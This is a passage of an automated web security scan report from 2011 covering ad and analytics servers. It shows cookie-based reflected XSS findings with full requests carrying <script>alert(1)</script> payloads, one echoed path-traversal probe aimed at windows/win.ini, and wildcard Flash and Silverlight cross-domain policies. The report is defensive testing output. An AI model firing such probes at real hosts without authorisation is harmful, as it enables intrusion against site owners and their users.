GET /bmx3/broker.pli?pid=p108883753&PRAd=65659550&AR_C=42804711 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N763.MicrosoftMediaNetwork/B5634534.12;sz=728x90;;click=;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/107000000000056488.1?!&&PID=8798816&UIT=G-&TargetID=52980966&AN=1376324361&PG=DLSRR1&ASID=d3af6362ac6e4a25944cc785a16bf745&destination=;ord=1376324361? User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&a52da<script>alert(1)</script>0e18f0dae67; ar_p82806590=exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; BMX_BR=pid=p109848095&prad=70982068&arc=43901049&exp=1316221073; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; UID=9cc29993-80.67.74.150-1314836282
|
Response
HTTP/1.1 200 OK Server: nginx Date: Sat, 17 Sep 2011 13:09:20 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p108883753=exp=76&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:09:20 2011&89dd4824e76d962d053637de=1&prad=65659550&arc=42804711&; expires=Fri 16-Dec-2011 13:09:20 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 29437
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"65659550",Pid:"p108883753",Arc:"42804711",Location:C ...[SNIP]... 7 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&', "ar_p90175839": 'exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&a52da<script>alert(1)</script>0e18f0dae67', "UID": '9cc29993-80.67.74.150-1314836282]]> ...[SNIP]...
|
5.83. http://ar.voicefive.com/bmx3/broker.pli [ar_p91136705 cookie]
previous
next
Summary
| Severity: |
Information |
| Confidence: |
Certain |
| Host: |
http://ar.voicefive.com |
| Path: |
/bmx3/broker.pli |
Issue detail
The value of the ar_p91136705 cookie is copied into the HTML document as plain text between tags. The payload a7b30<script>alert(1)</script>c18e1b7b6ac was submitted in the ar_p91136705 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p108883753&PRAd=65659550&AR_C=42804470 HTTP/1.1 Host: ar.voicefive.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N763.MicrosoftMediaNetwork/B5634534.12;sz=728x90;;click=;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/107000000000056488.1?!&&PID=8798816&UIT=A-&TargetID=52980966&AN=2048918403&PG=DLSRD1&ASID=d09c46b378244924a80762d176989e26&destination=;ord=2048918403? Cookie: ar_p97174789=exp=1&initExp=Mon Aug 8 01:43:12 2011&recExp=Mon Aug 8 01:43:12 2011&prad=314453501&arc=210323079&; UID=187a66e5-80.67.74.153-1312767792; ar_p91143664=exp=24&initExp=Wed Aug 17 18:11:34 2011&recExp=Wed Aug 17 18:13:16 2011&468db16b9200b4026215b7a4=1&prad=309847789&arc=218676900&; ar_p107223597=exp=1&initExp=Thu Sep 1 03:23:36 2011&recExp=Thu Sep 1 03:23:36 2011&prad=74127&arc=452367&; ar_p82806590=exp=1&initExp=Sun Sep 4 14:46:33 2011&recExp=Sun Sep 4 14:46:33 2011&prad=58779256&arc=43578905&; ar_p91136705=exp=1&initExp=Sun Sep 11 12:27:33 2011&recExp=Sun Sep 11 12:27:33 2011&prad=309650252&arc=206710286&a7b30<script>alert(1)</script>c18e1b7b6ac
|
Response
HTTP/1.1 200 OK Server: nginx Date: Sat, 17 Sep 2011 14:44:36 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p108883753=exp=249&initExp=Sat Sep 17 14:34:51 2011&recExp=Sat Sep 17 14:44:36 2011&89dd48247dd5113d6472e752=1&prad=65659550&arc=42804470&; expires=Fri 16-Dec-2011 14:44:36 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 34267
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"65659550",Pid:"p108883753",Arc:"42804470",Location:C ...[SNIP]... Sep 17 14:43:05 2011&recExp=Sat Sep 17 14:43:05 2011&prad=65659550&arc=42804711&', "ar_p91136705": 'exp=1&initExp=Sun Sep 11 12:27:33 2011&recExp=Sun Sep 11 12:27:33 2011&prad=309650252&arc=206710286&a7b30<script>alert(1)</script>c18e1b7b6ac', "ar_p10888375389dd4824c74f6d1bc8cd0e3": 'exp=1&initExp=Sat Sep 17 14:42:57 2011&recExp=Sat Sep 17 14:42:57 2011&prad=65659550&arc=42804470&', "../../../../../../../../../windows/win.ini": 'exp=1&i ...[SNIP]...
|
5.84. http://ar.voicefive.com/bmx3/broker.pli [ar_p91143664 cookie]
previous
next
Summary
| Severity: |
Information |
| Confidence: |
Certain |
| Host: |
http://ar.voicefive.com |
| Path: |
/bmx3/broker.pli |
Issue detail
The value of the ar_p91143664 cookie is copied into the HTML document as plain text between tags. The payload 87988<script>alert(1)</script>beef12b139 was submitted in the ar_p91143664 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p108883753&PRAd=65659550&AR_C=42804470 HTTP/1.1 Host: ar.voicefive.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N763.MicrosoftMediaNetwork/B5634534.12;sz=728x90;;click=;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/107000000000056488.1?!&&PID=8798816&UIT=A-&TargetID=52980966&AN=2048918403&PG=DLSRD1&ASID=d09c46b378244924a80762d176989e26&destination=;ord=2048918403? Cookie: ar_p97174789=exp=1&initExp=Mon Aug 8 01:43:12 2011&recExp=Mon Aug 8 01:43:12 2011&prad=314453501&arc=210323079&; UID=187a66e5-80.67.74.153-1312767792; ar_p91143664=exp=24&initExp=Wed Aug 17 18:11:34 2011&recExp=Wed Aug 17 18:13:16 2011&468db16b9200b4026215b7a4=1&prad=309847789&arc=218676900&87988<script>alert(1)</script>beef12b139; ar_p107223597=exp=1&initExp=Thu Sep 1 03:23:36 2011&recExp=Thu Sep 1 03:23:36 2011&prad=74127&arc=452367&; ar_p82806590=exp=1&initExp=Sun Sep 4 14:46:33 2011&recExp=Sun Sep 4 14:46:33 2011&prad=58779256&arc=43578905&; ar_p91136705=exp=1&initExp=Sun Sep 11 12:27:33 2011&recExp=Sun Sep 11 12:27:33 2011&prad=309650252&arc=206710286&
|
Response
HTTP/1.1 200 OK Server: nginx Date: Sat, 17 Sep 2011 14:44:13 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p108883753=exp=183&initExp=Sat Sep 17 14:34:51 2011&recExp=Sat Sep 17 14:44:13 2011&89dd48247dd5113d6472e752=1&prad=65659550&arc=42804470&; expires=Fri 16-Dec-2011 14:44:13 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 34266
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"65659550",Pid:"p108883753",Arc:"42804470",Location:C ...[SNIP]... %2D1%2Cts%2D%3E1316264640%2E321%2Cwait%2D%3E10000%2C', "ar_p91143664": 'exp=24&initExp=Wed Aug 17 18:11:34 2011&recExp=Wed Aug 17 18:13:16 2011&468db16b9200b4026215b7a4=1&prad=309847789&arc=218676900&87988<script>alert(1)</script>beef12b139', "ar_p108883753'": 'exp=2&initExp=Sat Sep 17 13:09:11 2011&recExp=Sat Sep 17 14:43:10 2011&prad=65659550&arc=42804470&', "ar_p10888375389dd4824d54af3ec28217b10": 'exp=1&initExp=Sat Sep 17 13:09:06 ...[SNIP]...
|
5.85. http://ar.voicefive.com/bmx3/broker.pli [ar_p97174789 cookie]
previous
next
Summary
| Severity: |
Information |
| Confidence: |
Certain |
| Host: |
http://ar.voicefive.com |
| Path: |
/bmx3/broker.pli |
Issue detail
The value of the ar_p97174789 cookie is copied into the HTML document as plain text between tags. The payload 9360d<script>alert(1)</script>4f10f0495de was submitted in the ar_p97174789 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p108883753&PRAd=65659550&AR_C=42804470 HTTP/1.1 Host: ar.voicefive.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N763.MicrosoftMediaNetwork/B5634534.12;sz=728x90;;click=;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/107000000000056488.1?!&&PID=8798816&UIT=A-&TargetID=52980966&AN=2048918403&PG=DLSRD1&ASID=d09c46b378244924a80762d176989e26&destination=;ord=2048918403? Cookie: ar_p97174789=exp=1&initExp=Mon Aug 8 01:43:12 2011&recExp=Mon Aug 8 01:43:12 2011&prad=314453501&arc=210323079&9360d<script>alert(1)</script>4f10f0495de; UID=187a66e5-80.67.74.153-1312767792; ar_p91143664=exp=24&initExp=Wed Aug 17 18:11:34 2011&recExp=Wed Aug 17 18:13:16 2011&468db16b9200b4026215b7a4=1&prad=309847789&arc=218676900&; ar_p107223597=exp=1&initExp=Thu Sep 1 03:23:36 2011&recExp=Thu Sep 1 03:23:36 2011&prad=74127&arc=452367&; ar_p82806590=exp=1&initExp=Sun Sep 4 14:46:33 2011&recExp=Sun Sep 4 14:46:33 2011&prad=58779256&arc=43578905&; ar_p91136705=exp=1&initExp=Sun Sep 11 12:27:33 2011&recExp=Sun Sep 11 12:27:33 2011&prad=309650252&arc=206710286&
|
Response
HTTP/1.1 200 OK Server: nginx Date: Sat, 17 Sep 2011 14:43:53 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p108883753=exp=127&initExp=Sat Sep 17 14:34:51 2011&recExp=Sat Sep 17 14:43:53 2011&89dd48247dd5113d6472e752=1&prad=65659550&arc=42804470&; expires=Fri 16-Dec-2011 14:43:53 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 34267
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"65659550",Pid:"p108883753",Arc:"42804470",Location:C ...[SNIP]... Sep 17 14:43:12 2011&recExp=Sat Sep 17 14:43:12 2011&prad=65659550&arc=42804470&', "ar_p97174789": 'exp=1&initExp=Mon Aug 8 01:43:12 2011&recExp=Mon Aug 8 01:43:12 2011&prad=314453501&arc=210323079&9360d<script>alert(1)</script>4f10f0495de', "ar_14f8a e8f18967c2c": 'exp=1&initExp=Sat Sep 17 14:43:08 2011&recExp=Sat Sep 17 14:43:08 2011&prad=65659550&arc=42804470&', "ar_p1088837538f683 b27e0f2581a": 'exp=1&initExp=Sat Sep 17 13:09:10 ...[SNIP]...
|
6. Flash cross-domain policy
previous
next
There are 12 instances of this issue:
Issue background
The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.
Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.
Issue remediation
You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.
6.1. http://adserver.teracent.net/crossdomain.xml
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://adserver.teracent.net |
| Path: |
/crossdomain.xml |
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: adserver.teracent.net
|
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 ETag: W/"373-1310681141000" Last-Modified: Thu, 14 Jul 2011 22:05:41 GMT Content-Type: application/xml Content-Length: 373 Date: Sat, 17 Sep 2011 13:33:30 GMT Connection: close
<?xml version="1.0" encoding="UTF-8"?> <cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd"> <sit ...[SNIP]... <allow-access-from domain="*" /> ...[SNIP]...
|
6.2. http://b.scorecardresearch.com/crossdomain.xml
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://b.scorecardresearch.com |
| Path: |
/crossdomain.xml |
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: b.scorecardresearch.com
|
Response
HTTP/1.0 200 OK Last-Modified: Thu, 07 Jul 2011 18:29:25 GMT Content-Type: application/xml Expires: Sun, 18 Sep 2011 12:41:15 GMT Date: Sat, 17 Sep 2011 12:41:15 GMT Content-Length: 201 Connection: close Cache-Control: private, no-transform, max-age=86400
<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="*"/> </cross-domain-policy ...[SNIP]...
|
6.3. http://cdn.slidesharecdn.com/crossdomain.xml
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://cdn.slidesharecdn.com |
| Path: |
/crossdomain.xml |
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: cdn.slidesharecdn.com
|
Response
HTTP/1.0 200 OK x-amz-id-2: 0vXFTZG8neFdAAnQEKlaE6KpEskPVR4GewkIT4BeR9Xm0rBhUnkmXHE6s50Oy0w8 x-amz-request-id: 4CA09AE8AD1C8BFB Last-Modified: Mon, 11 Oct 2010 10:20:16 GMT ETag: "c135d73798bc4bc5aad6d1aa4a8aa073" Accept-Ranges: bytes Content-Type: application/xml Content-Length: 78 Server: AmazonS3 Date: Sat, 17 Sep 2011 14:45:45 GMT Connection: close
<cross-domain-policy> <allow-access-from domain="*"/> </cross-domain-policy> |
6.4. http://cspix.media6degrees.com/crossdomain.xml
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://cspix.media6degrees.com |
| Path: |
/crossdomain.xml |
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: cspix.media6degrees.com
|
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 14:44:06 GMT Server: Apache/2.2.3 (CentOS) Last-Modified: Thu, 13 Nov 2008 04:04:22 GMT ETag: "c8143-120-45b8a3523dd80" Accept-Ranges: bytes Content-Length: 288 Connection: close Content-Type: image/gif
<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-http-request-headers-from domain="*" headers="*" ...[SNIP]... <allow-access-from domain="*" secure="false"/> ...[SNIP]...
|
6.5. http://pcdn.tcgmsrv.net/crossdomain.xml
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://pcdn.tcgmsrv.net |
| Path: |
/crossdomain.xml |
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: pcdn.tcgmsrv.net
|
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 13:33:40 GMT Server: PWS/1.7.3.3 X-Px: ht lax-agg-n57.panthercdn.com ETag: "a0047-175-48e8423f61640" Cache-Control: max-age=604800 Expires: Fri, 23 Sep 2011 16:44:03 GMT Age: 74977 Content-Length: 373 Content-Type: application/xml Last-Modified: Mon, 23 Aug 2010 21:14:57 GMT Connection: close
<?xml version="1.0" encoding="UTF-8"?> <cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd"> <sit ...[SNIP]... <allow-access-from domain="*" /> ...[SNIP]...
|
6.6. http://pixel.33across.com/crossdomain.xml
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://pixel.33across.com |
| Path: |
/crossdomain.xml |
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: pixel.33across.com
|
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 14:44:02 GMT Server: Apache Last-Modified: Thu, 21 Jul 2011 23:52:41 GMT Accept-Ranges: bytes Content-Length: 211 Connection: close Content-Type: text/xml
<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy> <allow-access-from domain="*" secure="false"/> </cross-doma ...[SNIP]...
|
6.7. http://s.dlqm.net/crossdomain.xml
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://s.dlqm.net |
| Path: |
/crossdomain.xml |
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: s.dlqm.net
|
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 14:33:52 GMT Server: Apache Last-Modified: Thu, 22 Apr 2010 18:40:30 GMT ETag: "1feaa12-ca-484d7a52d6637" Accept-Ranges: bytes Content-Length: 202 Keep-Alive: timeout=120, max=392 Connection: Keep-Alive Content-Type: application/xml Set-Cookie: NSC_iuuq-t.emrn.ofu=445836713660;Version=1;Max-Age=1200;path=/
<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy ...[SNIP]...
|
6.8. http://s1.2mdn.net/crossdomain.xml
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://s1.2mdn.net |
| Path: |
/crossdomain.xml |
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: s1.2mdn.net
|
Response
HTTP/1.0 200 OK Vary: Accept-Encoding Content-Type: text/x-cross-domain-policy Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT Date: Sat, 17 Sep 2011 02:43:22 GMT Expires: Sat, 17 Sep 2011 02:43:12 GMT X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 1; mode=block Age: 38764 Cache-Control: public, max-age=86400
<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd"> <!-- Policy file for http://www.doubleclick.net --> <cross-domain-policy> <site- ...[SNIP]... <allow-access-from domain="*" secure="false"/> ...[SNIP]...
|
6.9. http://segment-pixel.invitemedia.com/crossdomain.xml
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://segment-pixel.invitemedia.com |
| Path: |
/crossdomain.xml |
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: segment-pixel.invitemedia.com
|
Response
HTTP/1.0 200 OK Server: IM BidManager Date: Sat, 17 Sep 2011 14:44:03 GMT Content-Type: text/plain Content-Length: 81
<cross-domain-policy> <allow-access-from domain="*"/> </cross-domain-policy>
|
6.10. http://segs.btrll.com/crossdomain.xml
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://segs.btrll.com |
| Path: |
/crossdomain.xml |
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: segs.btrll.com
|
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 13:42:23 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g Last-Modified: Wed, 27 Oct 2010 21:47:51 GMT ETag: "28e808b-10d-493a02d4e4fc0" Accept-Ranges: bytes Content-Length: 269 Connection: close Content-Type: application/xml
<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <site-control permitted-cross-domain-policies="master ...[SNIP]... <allow-access-from domain="*" /> ...[SNIP]...
|
6.11. http://survey.questionmarket.com/crossdomain.xml
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://survey.questionmarket.com |
| Path: |
/crossdomain.xml |
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: survey.questionmarket.com
|
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 14:37:49 GMT Server: Apache Last-Modified: Thu, 22 Apr 2010 18:40:30 GMT ETag: "1feaa12-ca-484d7a52d6637" Accept-Ranges: bytes Content-Length: 202 Keep-Alive: timeout=120, max=859 Connection: Keep-Alive Content-Type: application/xml Set-Cookie: NSC_tvswfz-iuuq=4458360f3660;Version=1;Max-Age=1200;path=/
<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy ...[SNIP]...
|
6.12. http://www.slideshare.net/crossdomain.xml
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://www.slideshare.net |
| Path: |
/crossdomain.xml |
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.slideshare.net
|
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Content-Type: text/xml; charset=utf-8 Last-Modified: Fri, 16 Sep 2011 21:56:56 GMT Expires: Sat, 17 Sep 2011 22:04:27 GMT Cache-Control: max-age=86400 Content-Length: 222 Date: Sat, 17 Sep 2011 14:45:35 GMT X-Varnish: 715112579 703510786 Age: 60068 Via: 1.1 varnish Connection: close
<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="*" to-ports="*" />
...[SNIP]...
|
7. Silverlight cross-domain policy
previous
next
There are 3 instances of this issue:
Issue background
The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.
Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.
Issue remediation
You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.
7.1. http://b.scorecardresearch.com/clientaccesspolicy.xml
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://b.scorecardresearch.com |
| Path: |
/clientaccesspolicy.xml |
Issue detail
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: b.scorecardresearch.com
|
Response
HTTP/1.0 200 OK Last-Modified: Thu, 07 Jul 2011 18:29:25 GMT Content-Type: application/xml Expires: Sun, 18 Sep 2011 12:41:15 GMT Date: Sat, 17 Sep 2011 12:41:15 GMT Content-Length: 320 Connection: close Cache-Control: private, no-transform, max-age=86400
<?xml version="1.0" encoding="utf-8" ?> <access-policy> <cross-domain-access> <policy> <allow-from> <domain uri="*" /> </allow-from> <grant-to> <resou ...[SNIP]...
|
7.2. http://pixel.33across.com/clientaccesspolicy.xml
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://pixel.33across.com |
| Path: |
/clientaccesspolicy.xml |
Issue detail
The application publishes a Silverlight cross-domain policy which allows access from any domain.
